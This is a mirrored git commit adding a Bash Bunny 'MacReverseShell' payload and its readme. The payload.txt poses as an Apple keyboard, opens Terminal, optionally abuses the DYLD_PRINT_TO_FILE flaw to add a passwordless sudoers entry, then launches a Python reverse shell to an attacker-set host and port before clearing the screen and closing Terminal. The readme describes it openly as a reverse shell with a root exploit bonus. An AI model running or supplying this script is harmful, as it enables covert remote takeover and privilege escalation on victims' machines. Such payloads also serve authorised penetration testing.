mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
commit
1e8406bc38
49
payloads/library/MacReverseShell/payload.txt
Executable file
49
payloads/library/MacReverseShell/payload.txt
Executable file
@ -0,0 +1,49 @@
|
|||||||
|
LED B
|
||||||
|
#Set your Variables, bro
|
||||||
|
DYLD_ROOT=true
|
||||||
|
LHOST=192.168.17.12
|
||||||
|
LPORT=4444
|
||||||
|
|
||||||
|
LANGUAGE='us'
|
||||||
|
|
||||||
|
# Gimme a Keyboard please. Thanks.
|
||||||
|
ATTACKMODE HID VID_0X05AC PID_0X021E
|
||||||
|
LED R G B
|
||||||
|
|
||||||
|
# Get a terminal
|
||||||
|
QUACK DELAY 400
|
||||||
|
QUACK GUI SPACE
|
||||||
|
QUACK DELAY 300
|
||||||
|
QUACK STRING terminal
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 400
|
||||||
|
|
||||||
|
# optional DYLD exploit script
|
||||||
|
if $DYLD_ROOT; then
|
||||||
|
LED R
|
||||||
|
QUACK SPACE
|
||||||
|
QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 200
|
||||||
|
fi
|
||||||
|
|
||||||
|
# python reverse shell
|
||||||
|
QUACK SPACE
|
||||||
|
QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\)
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK SPACE
|
||||||
|
QUACK STRING clear
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK GUI q
|
||||||
|
QUACK DELAY 100
|
||||||
|
QUACK ENTER
|
||||||
|
|
||||||
|
# Green is the official Light of "finished"
|
||||||
|
LED G
|
||||||
21
payloads/library/MacReverseShell/readme.md
Executable file
21
payloads/library/MacReverseShell/readme.md
Executable file
@ -0,0 +1,21 @@
|
|||||||
|
# Mac Reverse Shell
|
||||||
|
|
||||||
|
Author: mrt0mat0
|
||||||
|
Version: Version 1.0
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell.
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
|
||||||
|
This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs
|
||||||
|
|
||||||
|
## STATUS
|
||||||
|
|
||||||
|
| LED | Status |
|
||||||
|
| ---------------- | ------------------------------------- |
|
||||||
|
| Blue | Setup |
|
||||||
|
| White | Running the scripts |
|
||||||
|
| Red | r00t exploit is running (optional |
|
||||||
|
| Green | Finished |
|
||||||
Loading…
x
Reference in New Issue
Block a user